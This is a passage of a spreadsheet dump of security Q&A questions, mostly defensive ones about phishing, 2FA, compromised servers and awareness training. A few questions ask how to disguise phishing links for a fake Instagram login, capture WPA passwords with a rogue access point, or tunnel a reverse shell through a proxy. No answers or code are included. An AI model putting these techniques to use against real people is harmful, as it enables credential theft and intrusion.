 &lt;li&gt;The credential harvesting website presents the same challenge to the victim's web browser&lt;/li&gt;
 &lt;li&gt;The victim signs the challenge and sends the challenge response to the credential harvesting site&lt;/li&gt;
 &lt;li&gt;The attacker sends the challenge response to the legitimate website and authenticates as the victim&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;This &lt;a href="https://security.stackexchange.com/a/261357/13842"&gt;answer&lt;/a&gt; on the Information Security Stack Exchange claims it is not possible, but I don't fully understand why. If a key pair is generated for for use only for a specific domain (enforced by the browser), the private key must be stored on a hardware key (such as a Yubikey)? Is that correct? What is the limit to the number of keys that can be stored, and what happens when that limit is reached?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;social-engineering&gt;&lt;fido&gt;&lt;fido2&gt;</t>
  </si>
  <si>
    <t>Is pull inherently more secure than push?</t>
  </si>
  <si>
    <t>&lt;p&gt;Users of a service are waiting for something to happen - a money transfer for example.&lt;/p&gt;
 &lt;p&gt;An attacker might forge an email notification, that executes an XSRF attack.&lt;/p&gt;
 &lt;p&gt;Alternatively, I could leave it up to the user to check back as and when they want to, by visiting a web page. Over https, the notification they receive is encrypted and signed as being genuine.&lt;/p&gt;
 &lt;p&gt;My examples are biased against the flaws of email. There are lots of different types of push and pull messaging systems.&lt;/p&gt;
 &lt;p&gt;That said, I am curious to know if there is something inherently more secure in pull based designs?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What steps need to do to identify security hole</t>
  </si>
  <si>
    <t>&lt;p&gt;I use VPS hosting. Installed CentOS 6 and ZPanel according to this tutorial &lt;a href="http://www.zvps.co.uk/zpanelcp/centos-6" rel="nofollow"&gt;http://www.zvps.co.uk/zpanelcp/centos-6&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Received warning from hosting provider: 
 This URL has been identified as a phishing site and is currently involved in identity theft activities.
 URL: hxxp://111.11.238.177/www.connet-itunes.fr/iTunesConnect.woasp/
 (url here and further are a bit modified)&lt;/p&gt;
 &lt;p&gt;Downloaded server files to local computer. Searched for &lt;code&gt;itunes&lt;/code&gt;. Found logs like these&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;\var\log\httpd\access_log
 111.11.160.253 - - [20/Oct/2013:15:18:07 -0400] "GET /www.connet-itunes.fr/iTunesConnect.woasp/ HTTP/1.1" 200 1326 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.10"
 11.111.144.148 - - [20/Oct/2013:15:30:13 -0400] "GET /www.connet-itunes.fr/iTunesConnect.woasp/ HTTP/1.1" 200 1326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows\t\t\t\t\tNT 5.2)"
 11.111.33.36 - - [14/Oct/2013:03:26:49 -0400] "POST /www.connet-itunes.fr/iTunesConnect.woasp/inscription/ HTTP/1.1" 200 13392 "http://176.56.238.177/www.connet-itunes.fr/iTunesConnect.woasp/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.50.2 (KHTML, like Gecko) Version/5.0.6 Safari/533.22.3"
 \var\zpanel\logs\domains\zadmin\mydomainname.com-error.log 1¬†443,00 KB 23.10.2013 09:12:56
 [Tue Oct 15 02:47:30 2013] [error] [client 11.11.253.220] File does not exist: /var/zpanel/hostdata/zadmin/public_html/mydomainname_com/www.connet-itunes.fr, referer: http://www.mydomainname.com/www.connet-itunes.fr/iTunesConnect.woasp/
 \var\var\zpanel\logs\domains\zadmin\mydomainname.com-access.log 111,00 KB 23.10.2013 09:12:56
 11.11.253.220 - - [15/Oct/2013:02:47:30 -0400] "GET /www.connet-itunes.fr/iTunesConnect.woasp/ HTTP/1.0" 404 - "http://www.mydomainname.com/www.connet-itunes.fr/iTunesConnect.woasp/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
 \var\zpanel\logs\domains\zadmin\anotherdomain.lv-access.log 4¬†386,00 KB 23.10.2013 14:02:56
 11.11.164.110 - - [15/Oct/2013:02:47:36 -0400] "GET /www.connet-itunes.fr/iTunesConnect.woasp/ HTTP/1.0" 404 42823 "http://www.anotherdomain.lv/www.connet-itunes.fr/iTunesConnect.woasp/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
 \var\zpanel\logs\domains\zadmin\anotherdomain.lv-error.log 196,00 KB 23.10.2013 12:41:40
 [Tue Oct 15 02:47:36 2013] [error] [client 11.11.164.110] File does not exist: /var/zpanel/hostdata/zadmin/public_html/anotherdomain_lv/www.connet-itunes.fr, referer: http://www.anotherdomain.lv/www.connet-itunes.fr/iTunesConnect.woasp/
 \var\log\httpd\error_log 36,00 KB 23.10.2013 13:08:36
 [Tue Oct 15 03:50:03 2013] [error] [client 11.111.23.90] Directory index forbidden by Options directive: /etc/zpanel/panel/www.connet-itunes.fr/
 [Tue Oct 15 05:28:28 2013] [error] [client 11.111.140.53] File does not exist: /etc/zpanel/panel/favicon.ico, referer: http://111.11.238.177/www.connet-itunes.fr/iTunesConnect.woasp/
 [Sat Oct 19 17:46:38 2013] [error] [client 5.49.165.166] PHP Notice: Undefined index: donnee2 in /etc/zpanel/panel/www.connet-itunes.fr/iTunesConnect.woasp/inscription/index.php on line 277
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Found one file (virustotal.com identified as &lt;code&gt;PHP:Shell-BH [Trj]&lt;/code&gt;, &lt;code&gt;PHP/BackDoor.BT&lt;/code&gt;, &lt;code&gt;VEX16c0.Webshell&lt;/code&gt;, &lt;code&gt;PHP/PhpShell.NAJ&lt;/code&gt;, &lt;code&gt;Backdoor:PHP/Shell.Q&lt;/code&gt;). Using that file hacker seems can get full control by server files (see, delete, upload, modify); I checked the file on local computer (wamp). &lt;/p&gt;
 &lt;p&gt;But from all the above I have no idea where is security hole. Location of that file was &lt;code&gt;etc/zpanel/panel/bin/&lt;/code&gt;. Does it means that hacker hacked ZPanel? Found one related discussion here &lt;a href="http://forums.zpanelcp.com/thread-8604.html" rel="nofollow"&gt;http://forums.zpanelcp.com/thread-8604.html&lt;/a&gt; But no solution. Please advice what steps need to do to identify security holes &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;webserver&gt;&lt;attack-prevention&gt;</t>
  </si>
  <si>
    <t>Received email addressed to someone else from themselves</t>
  </si>
  <si>
    <t>&lt;p&gt;My outlook account received a suspicious email, addressed to somebody else, AW, sent apparently from themselves to themselves.&lt;br&gt;
 The sender is not an outlook address, but I guess outlook might be hosting their service.&lt;br&gt;
 According to haveibeenpwned my email address has not been pwned, neither has that of the sender.&lt;br&gt;
 AW appears to be the name of a university professor.
 I have never attended that university, nor do I know the person.&lt;br&gt;
 An online search for the linked address leads to a lobbying group in the USA. Also some websites in Brazilian Portuguese.&lt;br&gt;
 Clearwebstats claims the website with the linked domain name is safe to browse. (is worth 8.95$ and makes 0.15$ per day)&lt;/p&gt;
 &lt;p&gt;Why / How is this an exploit?&lt;br&gt;
 What is the goal of such an exploit?&lt;br&gt;
 How does it work? &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/aGMg3.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/aGMg3.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>How secure is Kee 2.0 (Firefox 57 addon) with keepass-plugin-rpc compared to LastPass?</t>
  </si>
  <si>
    <t>&lt;p&gt;I wish to evaluate two different password security options which at first seem to be distinctly different: &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;a cloud-based password manager&lt;/li&gt;
 &lt;li&gt;a local (non-cloud) password manager&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;However, the twist is that the local password manager will be used with a browser add-on to give it functionality and convenience on a par with the cloud-based option. To make this comparison useful and practical, let's limit it to these two specific products:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;KeePass with Kee 2.0 (Firefox 57 web extension) with keepass-plugin-rpc&lt;/li&gt;
 &lt;li&gt;LastPass (web extension version, Firefox 57)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Assume any potential threats lie entirely on the Internet side and that the local machine and local network are secure.&lt;/p&gt;
 &lt;p&gt;Are these two choices similarly secure in a general sense? The knee-jerk response may be to say that KeePass is more secure simply because it is not cloud-based (and we are assuming not threat from inside the local network or physical facility).&lt;/p&gt;
 &lt;p&gt;However, my question centers on the question of to what extent does using the Firefox addon with KeePass expose the entire password database to Internet-based attacks (of any type, including phishing -- anything that originated from outside).&lt;/p&gt;
 &lt;p&gt;I assume LastPass has had much more extensive security review and probably has a team of trained professionals keeping the whole thing secure.&lt;/p&gt;
 &lt;p&gt;On the other hand, the community seems to view KeePass favorably. But what about the Kee 2.0 Firefox add-on and the RPC plugin? Do those pieces have the same level of security review?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;firefox&gt;&lt;keepass&gt;&lt;lastpass&gt;</t>
  </si>
  <si>
    <t>Accessing WPA/WPA2 password from native auth form on a rogue router</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to &lt;a href="https://security.stackexchange.com/questions/17767/four-way-handshake-in-wpa-personal-wpa-psk"&gt;wrap my head around the WPA/WPA2 4-way handshake&lt;/a&gt; in an attempt to determine if it is possible for a rogue wireless access point to retrieve a plaintext (or hashed) version of a router's password that is delivered via a legitimate authentication form prompted by a client's native OS. I have plenty of experience capturing handshakes and cracking them in different pentesting scenarios, but I'm interested in exploring the following scenario:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;A rogue honeypot router responds to an STA probe request (w/ probe response or beacon). This honeypot initiates the WPA/WPA2 authentication process.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The client, believing the AP to be a known network, tries to connect, but is initially rejected because the WPA/WPA2 password does not match the password for the true router. For all the client knows, the network is the same, however the administrator has changed the password. A native OS auth form is presented to the client by the OS/Network Manager (likely with a password pre-filled). The client submits the password to the honeypot network that is using the temporary SSID of the trusted network.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;???. Is it possible for the honeypot, which is presenting the STA with a legitimate authentication requests (using any arbitrary WPA password on the router) to view the plaintext version of the password that was sent by the STA in an attempt to authenticate? If not, in what format is this password presented to the AP for authentication?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I'm interested in learning the current options (cli/tools) for this kind of phishing attack (again, relying entirely on a naive OS WPA authentication form, not a captive portal type HTML phishing page). If none exist, I'm curious if WPA/WPA2 would even allow for the scenario described in the above steps to occur. I'm a very comfortable programmer and am willing to patch Hostapd or use libpcap to implement this kind of functionality if need be. I just am having trouble determining if this type of attack is even possible. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;network&gt;&lt;wifi&gt;&lt;phishing&gt;&lt;wpa2&gt;</t>
  </si>
  <si>
    <t>Is there a term for vulnerabilities the need 'help' from target vs vulnerabilities that can be exploited with no actions from the target?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm making a guideline for a bug bounty program and want to distinguish between bugs that require some kind of action on the target's behalf (eg clicking a suspicious link), vs vulnerabilities that can be exploited without any actions from the user (eg, SQL injection that gives you users' credentials).&lt;/p&gt;
 &lt;p&gt;I don't necessarily mean phishing, just any vulnerability depending on action from the user rather than one that can be done 'cold', if that makes sense.&lt;/p&gt;
 &lt;p&gt;Does such terminology already exist?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;terminology&gt;</t>
  </si>
  <si>
    <t>How should failures by a single user on a simulated phishing email be measured?</t>
  </si>
  <si>
    <t>&lt;p&gt;I work in the IT Security function of my company as a team lead. We periodically send out phishing emails to all users on company network as a form of continuous education of users on how to spot malicious phishing emails. Our company operates in the regulated financial industry and have a diverse user base with various levels of technical ability from IT to customer service roles. We work frequently with sensitive customer data and personally identifiable information (PII).&lt;/p&gt;
 &lt;p&gt;My team does metrics reporting of user performance on these simulated emails. Sometimes end users take &lt;strong&gt;multiple ill - advised actions&lt;/strong&gt; on a single simulated phishing email we sent such as clicking a link, or opening an attachment in the email. &lt;/p&gt;
 &lt;p&gt;My thinking is that given each bad action &lt;strong&gt;potentially represents a different attack vector that can be exploited by a threat agent, each bad action should be counted as a separate failure&lt;/strong&gt;. After all, clicking on a malicious link in a true phishing email can result in compromise just as easily as opening an infected attachment in such email. The fact that a single user can take multiple bad actions on a single, albeit fake, phishing email seems to highlight how such end users are not really conscious of their actions or skeptical enough, which only emphasizes the value of this reporting methodology in my opinion.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question&lt;/strong&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;To most accurately measure end user behavior and where weaknesses may be, should multiple bad actions on an single email be counted as a 1 failure or should each action be counted as a failure on its own?&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;user-education&gt;&lt;end-user&gt;</t>
  </si>
  <si>
    <t>Is it enough to look at the sender's email address?</t>
  </si>
  <si>
    <t>&lt;p&gt;I use Gmail. When I receive an email, Gmail displays the sender's email address. So far I've always looked at this address when receiving sensitive mails, to avoid phishing. For example, I know by heart that PayPal's site is paypal.com so I just check that the email indeed comes from a paypal.com address. I always thought this is sufficient as a security measure.&lt;/p&gt;
 &lt;p&gt;Now, though, I read &lt;a href="https://support.google.com/mail/answer/3070163?hl=en&amp;amp;ref_topic=3394463"&gt;the "Authentication icon for verified senders" Gmail support article&lt;/a&gt;. It seems to say that my described practice is not enough and I should also enable the mentioned "lab" and look for the "key" icon every time.&lt;/p&gt;
 &lt;p&gt;My question is, why should I do that?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why is '@' a security risk in url?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm making a Phishing Filter with Machine Learning and I'm using the features mentioned in this paper &lt;a href="http://scialert.net/abstract/?doi=jas.2011.3301.3307" rel="noreferrer"&gt;http://scialert.net/abstract/?doi=jas.2011.3301.3307&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;One of the features says "URL contains hexadecimal characters or @ symbol", why is an @ in URL a potencial security risk, and more especific with Phishing?&lt;/p&gt;
 &lt;p&gt;EDIT: The filter is in the email level, so the URL would be as part of the message&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to make sure my phone is secure after a phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;Situation: My phone is an android (Samsung Galaxy s6) - In a moment of mindless distraction yesterday I opened a pdf in a phishing email - it did contain a link but I did not click it. Very shortly afterwards, I went to Facebook and it had logged me out, which it never does. This made me suspicious that there was indeed malicious code in that pdf so I installed Bitdefender Mobile. The scan was clear (and I've now repeated it several times). But then my banking app asked for extra authentication than it normally does so now I remain concerned that my phone is compromised but Bitdefender isn't catching it. &lt;br&gt;&lt;br&gt;My questions are: Is it likely that malware is being missed? And now that I have activated the App Lock feature in Bitdefender, does that protect me if there happens to be malware on my phone that is designed to steal credentials? Couldn't the malicious code just lift the credentials for App Lock like everything else, thereby rendering it useless?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;android&gt;&lt;account-security&gt;&lt;antimalware&gt;</t>
  </si>
  <si>
    <t>Does Two Factor Authentication (2FA) prevent Phishing and/or Man-in-the-Middle (MITM) attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;While 2FA is clearly an improvement over only a single factor, is there anything which prevents an adversary presenting a convincing sign-in page which captures both factors?&lt;/p&gt;
 &lt;p&gt;I realise that technically a MITM attack is different to a Phishing attack, though at a high level they're very similar -- the user is inputting their credentials into an attacker-controlled page and the attacker can then input the credentials onwards into the real page.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;multi-factor&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Bank website forwards to false site - formatted hard drive - still forwards</t>
  </si>
  <si>
    <t>&lt;p&gt;Summary: &lt;/p&gt;
 &lt;p&gt;When I visit my bank's website, I get forwarded to a phishing mirror site. &lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;This has persisted through a re-format of my MacBook.&lt;/li&gt;
 &lt;li&gt;Even on different browsers!&lt;/li&gt;
 &lt;li&gt;Other computers on the same network do not have this problem, so I don't think it's the router.&lt;/li&gt;
 &lt;li&gt;Visiting my bank site through a VPN works fine so it doesn't seem like a virus either.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What could be going on here?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Full Story:&lt;/p&gt;
 &lt;p&gt;A few weeks ago my bank account was hacked. I had typed in the url to my bank's website and was forwarded to a mirror site without noticing, where I stupidly put in my account details. This was using Chrome on an MackBook Pro. I went to the bank to lodge a fraud claim and they said it must be my computer because nobody else has reported this problem. &lt;/p&gt;
 &lt;p&gt;I formatted my laptop by following these instructions: &lt;a href="http://smallbusiness.chron.com/reformat-macbook-53599.html" rel="noreferrer"&gt;http://smallbusiness.chron.com/reformat-macbook-53599.html&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I went back to the bank's website and was still forwarded to the mirror site! (Now that I'm looking for it, I can tell because the url is slightly different and not https). So I tried on different browsers, because I remembered that in the past this bank used digital certificates, so maybe there is one saved in my chrome settings somewhere that has been compromised. (I tried anonymous browsing, plus Safari, and even downloaded and tried Epic browser) and still I get forwarded to the false site!&lt;/p&gt;
 &lt;p&gt;On my brother-in-law's laptop on the same router/LAN, it goes to the proper bank website with no forwarding.&lt;/p&gt;
 &lt;p&gt;But if I visit the website through a VPN, it doesn't forward me to the false site! What the heck?? Is there a virus on my computer? Surely if it was local, the VPN would make no difference? But if it was at the bank's end, then it wouldn't be happening to just me! I'm confused and worried about my online security now. Can anybody shed any light on what might be going on here?&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;UPDATE:&lt;/p&gt;
 &lt;p&gt;First thing I did was ping the bank's URL from ping.eu and it returned an address that starts 186... When I copy this IP into my URL bar, it says "the site can't be reached. [IP Address] took too long to respond"&lt;/p&gt;
 &lt;p&gt;Then I pinged the same URL from "network utility" on my macbook, and it returned a different IP address! When I copied this one into my URL bar, I got a chrome page saying "Security error! Deceptive site ahead".&lt;/p&gt;
 &lt;p&gt;My dns server is listed as 192.168.0.1 - totally normal right? So it's the router? But my B-I-L's laptop doesn't have the issue?
 What does this mean?? And what should I do??&lt;/p&gt;
 &lt;hr&gt;
 &lt;p&gt;Another update:&lt;/p&gt;
 &lt;p&gt;After the help you guys gave me on router and dns problems I googled "how to detect mitm attack". I checked the dns settings on the router, and it has the "use these dns servers" box ticked, with two random IP addresses filled in. I unticked the box, went to my bank's website and voila! No phishing site. &lt;/p&gt;
 &lt;p&gt;So they hacked my router? I didn't even know that was possible, but now that I think about it, it is remotely accessible on the LAN and the username/password is the manufacturer default. Will a hard reset of the router and then changing the username/password be sufficient now? &lt;/p&gt;
 &lt;p&gt;Another question is, how did they gain access to my router in the first place? Should my BIL also format his laptop in case it was a virus?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;vpn&gt;&lt;url-redirection&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>CISO goes to jail if something goes wrong?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm building up most functions out of opensource projects; honeypots, firewall, ERP, CRM, PBX, physical security, software security, network security, security government, asset policy management, etc.&lt;/p&gt;
 &lt;p&gt;I'm doing as much as I can in order to minimize risks but in the worst scenario, let's suppose my company gets compromised by any vector; some employee got phished, 0-day scenario. There's incident response, documentation, and procedures to resolve the issue and mitigate it.&lt;/p&gt;
 &lt;p&gt;I wish to know if I'm running a risk if I sign as a CISO in a company. I have my plans but I'm kind of new to this corporate world.&lt;/p&gt;
 &lt;p&gt;I've heard that people hire services and if something happens you can blame the service, for example. I really dislike the idea of spending money on a service I can implement on my own, but maybe I need this to cover my own liability?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;legal&gt;&lt;risk-management&gt;</t>
  </si>
  <si>
    <t>Anti-phishing educational resources for users?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm am looking into conducting a phishing campaign to gauge how susceptible my workplace is to phishing attacks. Part of this will involve guiding "duped" users to materials or resources that will help users learn how to spot and handle phishing attempts. &lt;/p&gt;
 &lt;p&gt;Would anyone happen to know of some good, preferably free, resources we could utilize? We already have a plan for conducting the campaign(i.e., sending the emails, tracking them, etc...), I'm looking for what to do once a person clicks through the email and now should be helped in learning about phishing and it's threats. &lt;/p&gt;</t>
  </si>
  <si>
    <t>My website got blacklisted as "phishing". Any hints on how to avoid that?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a personal website hosted using my provider's DNS name (i.e. &lt;code&gt;myname.provider.com&lt;/code&gt;) on my personal hardware at home. The web server (both HTTP and HTTPS) is Apache on Debian Wheezy (which is rather dated), but I update it regularly. It has an OwnClound instance, a simple PHP form to send an SMS to my phone and my wife's, and a photo gallery with some art stuff my wife made. The site has an up to date Letsencrypt certificate. There's also an open SSH port for remote maintenance.&lt;/p&gt;
 &lt;p&gt;Recently, this website got classified as 'phishing' by &lt;a href="http://sitereview.bluecoat.com" rel="nofollow noreferrer"&gt;Blue Coat&lt;/a&gt; Web Filter list, so neither me nor my wife can access it at work. Using the tool from &lt;a href="https://security.stackexchange.com/a/175350/71607"&gt;this post&lt;/a&gt; shows no further problems.&lt;/p&gt;
 &lt;p&gt;I'm thinking about sending them a review request, but before I do, I would like to understand what could have gotten me blacklisted in the first place, to see if I can fix the problem beforehand. Is this because of OwnCloud? Web gallery? Letsencrypt certificate? Provider's DNS? Dated Apache? Open SSH port? Or do they just blacklists all URLs starting with 'D' because it's February?&lt;/p&gt;
 &lt;p&gt;What are the most common red flags which are used to blacklist websites?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;webserver&gt;&lt;phishing&gt;&lt;blacklist&gt;</t>
  </si>
  <si>
    <t>Making a phishing link look innocent</t>
  </si>
  <si>
    <t>&lt;h3&gt;Situation&lt;/h3&gt;
 &lt;p&gt;I am learning about phishing attacks using OSINT, social engineering and some Kali tools to send a mail to a dedicated target, which contains an 'appealing' message and an ngrok link leading to a fake website (a fake Instagram login page in my case) where the target should enter their credentials (Username and password) so they get relayed to me.&lt;/p&gt;
 &lt;p&gt;And I am also trying another method, in which the target should click a link that will connect to my server and download a script in the background and execute it, to change the hostname-register on the PC and to connect to another server to do a reverse-shell-attack.&lt;/p&gt;
 &lt;h3&gt;Question&lt;/h3&gt;
 &lt;p&gt;Both of these links don't look legit. I mean one is a bunch of numbers, seemingly random keywords and ends on ngrok and the other one is a bunch of numbers separated with dots (an IPv4 address). Nothing that looks trustworthy at all.&lt;/p&gt;
 &lt;p&gt;How can I make these links look more like for example &amp;quot;instagram.com&amp;quot; or &amp;quot;security.google.de&amp;quot; or whatever? Is there a method to display it differently in a mail (to basically hide the suspicious link behind a 'nice' one?)&lt;/p&gt;
 &lt;p&gt;And how do I display something trusty looking in the URL bar of the targets browser, so the fake Instagram pages URL doesn't shout &amp;quot;&lt;em&gt;iAmAViRuS!!11!&lt;/em&gt;&amp;quot; to the target? Is it even possible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Phishing Analysis</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently analyzing and exploring daily phishing attempts. Some at points, I am unable to definitively verify if this is, in fact, a phishing attempt.&lt;/p&gt;
 &lt;p&gt;When analyzing phishing attempts, specifically spear phishing, has one ever felt the need for an isolated analysis machine where you can click on links to your leisure and download PUA's? &lt;/p&gt;
 &lt;p&gt;The process I have undergone is essentially: &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;check headers end-to-end, &lt;/li&gt;
 &lt;li&gt;if it seems legit move to URL scanners like Virus Total &amp;amp; Symantec URL checker etc. &lt;/li&gt;
 &lt;li&gt;if this checks out assume it was never scanned or crawled and try to understand why the end user reported this as phishing etc. &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Beyond the typical 100% definitively confirmed phishing attempts where a user utilizes poor grammar, shortened URL's, sketchy URL extensions or sketchy attachments, at what point should one stop putting time and effort into analyzing a phishing attempt? &lt;/p&gt;
 &lt;p&gt;I understand this question may sway towards an opinion, however I would like to direct the answers towards trying to prevent false negatives. When we have a legitimate email but things still cannot be confirmed and we label it as phishing.&lt;/p&gt;
 &lt;p&gt;Is it safer to always abide by the "trust no one policy"?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Max13</t>
  </si>
  <si>
    <t>Checking if a server is compromised</t>
  </si>
  <si>
    <t>&lt;p&gt;I do free/low-cost web/shell hosting as a &lt;a href="https://www.virtual-info.info/" rel="nofollow" title="Virtual-Info"&gt;non-profit organization&lt;/a&gt; (With a the same friend and co-founder) since 2007.&lt;/p&gt;
 &lt;p&gt;We're on CentOS 6 + CPanel, and unfortunately we're still funding the organization from our own money. Since last year, we've noticed some strange subdomains, additional domains and parking domains created for phishing websites, we usually suspend or terminate them until we've noticed it was random and sometimes on trustworthy customers account or even ours (personal admin accounts).&lt;/p&gt;
 &lt;p&gt;2 months ago, we've rent a new and stronger server, reconfigured it from scratch and migrated the CPanel account, changed passwords, prevented root login without password ans changed our WHM access key, but the "strange" domains/subdomains are still appearing and BuyCpanel (our CPanel licence reseller) told us it seems to be a compromised server and we should investigate it.&lt;/p&gt;
 &lt;p&gt;We would like to investigate it ourselves but we don't know where to start or how to trace the origin of "compromise", we've checked root connections, FTP connections, WHM connections, we can't find a trace of a script creating the subdomains. Can you give us some advices?&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ssh&gt;</t>
  </si>
  <si>
    <t>HTTP reverse shell through corporate proxy</t>
  </si>
  <si>
    <t>&lt;p&gt;I'd like to test a scenario where the user receives a mallicious attachment in a phishing email. The attachment is intended to open an HTTP or HTTPS reverse shell to the attacker who sits outside of the corporate network.
 The network topology looks like this:&lt;/p&gt;
 &lt;p&gt;Attacker --- Internet --- Firewall --- Proxy --- Victim&lt;/p&gt;
 &lt;p&gt;The firewall blocks every outbound traffic except web browsing through proxy and DNS requests.
 The proxy uses authentication.&lt;/p&gt;
 &lt;p&gt;As I've red through numerous post in this topic, i've got the impression that a basic metasploit reverse http meterpreter shell would do the trick in this environment, but I'm curious how the reverse shell could go through the proxy? First of all how does it detect that there is a proxy and what is its address?&lt;/p&gt;
 &lt;p&gt;It's maybe kind of a noob question. My only idea is that if the proxy settings are set in the registry, Windows routs all the HTTP and HTTPS traffic toward the proxy transparently.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;penetration-test&gt;&lt;proxy&gt;</t>
  </si>
  <si>
    <t>Fake popups from popular websites</t>
  </si>
  <si>
    <t>&lt;p&gt;I just visited YouTube.com on Chrome and got a popup message that said "Your computer has a virus. You need to scan it with an antivirus". I think I had "OK" and "Cancel" buttons as options. It wasn't one of those loud ones with sounds and graphics, just the very simple gray Chrome popup in the top middle section that I know Chrome uses from time to time.&lt;/p&gt;
 &lt;p&gt;First thing I did is look left at the green lock to make sure I was on the right website, which it was, then shut off my machine immediately and unplugged the network cable. On another machine, I then looked up whether there's a live attack/compromise of YouTube, which I did not find. I then rebooted my desktop and checked some things(HW perf, newly installed programs, open TCP connections, running processes, etc) and did not find anything odd. Then I cleared all cache on my browser and went back to YouTube. Everything normal.&lt;/p&gt;
 &lt;p&gt;What are some possibilities on what happened?&lt;/p&gt;
 &lt;p&gt;I can only think of malware and XSS. I don't think it's a malware because I would have seen other signs.. Unless it's the sneakiest malware ever, I don't think it's a malware that pops up a fake warning once and never does anything else(altho I could just be not aware of it. But I do have quite tight control over my systems and if I do anything phishy I do it in VMs).&lt;/p&gt;
 &lt;p&gt;After I cleared cache I realized I could have double checked the browsing history to see if maybe it wasn't actually youtube, but I 100% checked the TLS lock at least before I shut it off.&lt;/p&gt;
 &lt;p&gt;And I've also seen other people(albeit non-techy) experience something similar, where they go to a popular website and still get those popups. Once I checked the browsing history after something similar happened to someone I know, and the person had gone to the correct website. I shrugged off, assuming the end user probably did something wrong. But this is the first time this ever happened to my machine and I'm more curious about how/what than scared.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;xss&gt;</t>
  </si>
  <si>
    <t>I received a phishing/spam email from Google Delivery Subsystem about an email I never sent. How?</t>
  </si>
  <si>
    <t>&lt;p&gt;Screenshot:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/nD7PN.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/nD7PN.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The text covered with red is exactly my email address except the end is @google.com instead of @gmail.com.&lt;/p&gt;
 &lt;p&gt;The suspicious link &amp;quot;Unsubscribe_click_here&amp;quot; is:
 &lt;code&gt;mailto:cr@burlondesti.com,kz@grendeoszel.com,ma@bindolamiats.com,couar.ort@gmail.com,krandelowez@foxmail.com,3561036101@qq.com,jacques.chirac088@gmail.com,sosiea0@outlook.com?Subject=.Unsubcribe%20now//&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;If I expand email details to show more info:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/h9MID.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/h9MID.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
